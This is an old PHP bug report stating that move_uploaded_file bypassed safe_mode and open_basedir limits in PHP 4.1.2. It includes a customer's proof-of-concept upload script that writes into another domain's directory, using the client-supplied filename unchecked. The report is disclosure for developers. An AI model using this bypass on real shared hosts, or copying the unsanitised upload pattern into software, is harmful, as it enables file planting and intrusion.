Bug #16128: move_uploaded_file breaks safe_mode and open_basedir restrictions

Sun, 17 Mar 2002 11:47:29 -0800 

From:             [EMAIL PROTECTED]
Operating system: Linux 2.4.13
PHP version:      4.1.2
PHP Bug Type:     *General Issues
Bug description:  move_uploaded_file breaks safe_mode and open_basedir restrictions

One of my customers has found a way to break my safe_mode and open_basedir
restrictions. (www.net-force.nl)

He created the following script:
<?
 
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type']; 
$size = $HTTP_POST_FILES['file']['size']; 
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

move_uploaded_file($temp,
"/domains/killanet.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded"; 
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>

As you can see, he moved the uploaded file to:
"/domains/killanet.org/public_html/www/test/"

Which should be impossible, because my httpd.conf says:

<VirtualHost 213.206.77.232>
        DocumentRoot /domains/net-force.nl/public_html/root/
        ServerName root.net-force.nl
        CustomLog /domains/net-force.nl/logs/access_log combined
        ErrorLog /domains/net-force.nl/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/net
force.nl/public_html/root/
</VirtualHost>

As you can see I have both set safe_mode and the open_basedir restriction
but this user is able to upload any file where the apache user has write
access.

Credits fly out to [EMAIL PROTECTED] for finding this bug. 
-- 
Edit bug report at http://bugs.php.net/?id=16128&edit=1
-- 
Fixed in CVS:        http://bugs.php.net/fix.php?id=16128&r=fixedcvs
Fixed in release:    http://bugs.php.net/fix.php?id=16128&r=alreadyfixed
Need backtrace:      http://bugs.php.net/fix.php?id=16128&r=needtrace
Try newer version:   http://bugs.php.net/fix.php?id=16128&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=16128&r=support
Expected behavior:   http://bugs.php.net/fix.php?id=16128&r=notwrong
Not enough info:     http://bugs.php.net/fix.php?id=16128&r=notenoughinfo
Submitted twice:     http://bugs.php.net/fix.php?id=16128&r=submittedtwice

Reply via email to